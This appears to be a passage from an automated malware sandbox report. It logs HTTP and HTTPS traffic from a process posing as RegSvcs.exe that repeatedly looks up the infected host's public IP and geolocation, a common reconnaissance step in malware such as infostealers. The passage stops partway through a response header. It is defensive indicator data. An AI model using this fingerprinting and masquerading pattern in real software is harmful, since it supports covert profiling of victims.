                                              Sep 26, 2024 10:23:03.113735914 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Sep 26, 2024 10:23:03.572737932 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 08:23:03 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 075d5ea961cf8ac703a51534428dd6e6
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Sep 26, 2024 10:23:03.576543093 CEST127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Sep 26, 2024 10:23:03.676399946 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 08:23:03 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: afc676ef02340df0a564469df9215220
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Sep 26, 2024 10:23:04.391239882 CEST127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Sep 26, 2024 10:23:04.490767002 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 08:23:04 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: ce504ab7b0b9f896ba2a1fa1313a4cad
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.449733193.122.130.0803152C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 10:23:05.115922928 CEST127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Sep 26, 2024 10:23:05.873536110 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 08:23:05 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: f97fb377d2035ff42293d860e1acf235
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.449735193.122.130.0803152C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 10:23:06.516117096 CEST127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Sep 26, 2024 10:23:06.980233908 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 08:23:06 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 0f193dedf069cffd45d8c20d556846b6
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.449737193.122.130.0803152C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 10:23:07.611140966 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Sep 26, 2024 10:23:08.065983057 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 08:23:08 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 0076f15c997cd7c0c54183b0a5167f94
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.449739193.122.130.0803152C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 10:23:08.658706903 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Sep 26, 2024 10:23:09.122798920 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 08:23:09 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 9bf3352ec31b9026ce011c30c39535fb
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.449741193.122.130.0803152C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 10:23:09.720248938 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Sep 26, 2024 10:23:10.193664074 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 08:23:10 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: a751cd6ad5f9e4dbf0dcb94539835bea
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.449743193.122.130.0803152C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 10:23:10.795315981 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Sep 26, 2024 10:23:11.272542953 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 08:23:11 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 4926607346794ff4677a9f8090e73621
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.449745193.122.130.0803152C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 10:23:11.918117046 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Sep 26, 2024 10:23:12.369131088 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 08:23:12 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: d516459e9eb7691d3ccce67d39ceb8e4
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              HTTPS Proxied Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.449731188.114.96.34433152C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 08:23:04 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-09-26 08:23:04 UTC683INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 08:23:04 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 3816
                                              Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=46P%2BEO8Hhnq9ldgzNvY4PYN6mkb%2FuNX2u1ASysLq4tL70HatkdGah6QNumJ%2FFhCEBfDZ%2B02GNDh9TTYOVpI53K1Eg3lJf40Cu2IA6bSnVS0%2FRkY0T04rcFGbUTIw%2FsOW%2BEjxGuQk"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c91d98bf84c42b9-EWR
                                              2024-09-26 08:23:04 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 08:23:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.449732188.114.96.34433152C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 08:23:04 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-09-26 08:23:05 UTC671INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 08:23:05 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 3817
                                              Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QkihJIwTzmH73zSMf52bNflD7lXf77z2yLKz9LNon6IldmQdO1JYI8UjZnBqhV67IPEhCJlnW%2FCCK7plhe53gVRGviTNfG0QjlEwWWCITJLekH5TEd6gDm2qoxggTpLxxLAFozLp"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c91d99089a8728d-EWR
                                              2024-09-26 08:23:05 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 08:23:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.449734188.114.96.34433152C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 08:23:06 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-09-26 08:23:06 UTC701INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 08:23:06 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 3818
                                              Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PhLIDBSplExCVM3OAuhPz7Vhi0VS79pFbNRfmjlwA6IKfjoaq853lSITAiugF79AIYx6CK6bX8T%2FdB9DpPbbAqMFKNVAktGAlNNNGoxcRbAbUJnlBQ2xmduzGsJOnN8uaZE66apr"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c91d9994a8d7c6f-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-09-26 08:23:06 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 08:23:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.449736188.114.96.34433152C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 08:23:07 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-09-26 08:23:07 UTC677INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 08:23:07 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 3819
                                              Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VuhpGE67h15emumKLrdrU3g9OrxgQU7eSGCKpf8EOycDIdqlqXjCKtlUS2YhtaD5MpiF%2Byew%2FZl0A7%2BHLtSRI790xb0Zcn3k8nl%2FX0FJ5bG2F8FSW8N8xYl8pbh6LxFKJ1Pe7bxn"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c91d9a0298b4316-EWR
                                              2024-09-26 08:23:07 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 08:23:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.449738188.114.96.34433152C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 08:23:08 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-09-26 08:23:08 UTC673INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 08:23:08 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 3820
                                              Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=swxfKsdDHBNcYjsG6WXtJHrgIvj%2BvWRS6YRcThHYsDsTLeaazgn6YS%2FyYLcXMevOGzrMVLskOCFSHDSKCOjiK35eqZk6iwfMsazRGG5HGTJgKyQge4rBMYHBG1StR54oOB6pTta6"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c91d9a6bc7c1996-EWR
                                              2024-09-26 08:23:08 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 08:23:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.449740188.114.96.34433152C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 08:23:09 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-09-26 08:23:09 UTC683INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 08:23:09 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 3821
                                              Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X87N6Hc%2B%2FOtexNI6wWAeWcQlUw5Podh%2BASztOLAxtGu3xPESzbvTocO954zQ06q7ZfV11cVyQO%2FqCIN0e%2BFyw914%2FzmYp3mmOoTjvUZHThFMDCwHWFO6%2B0Rmz7Fo7cyXhPNqLQLk"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
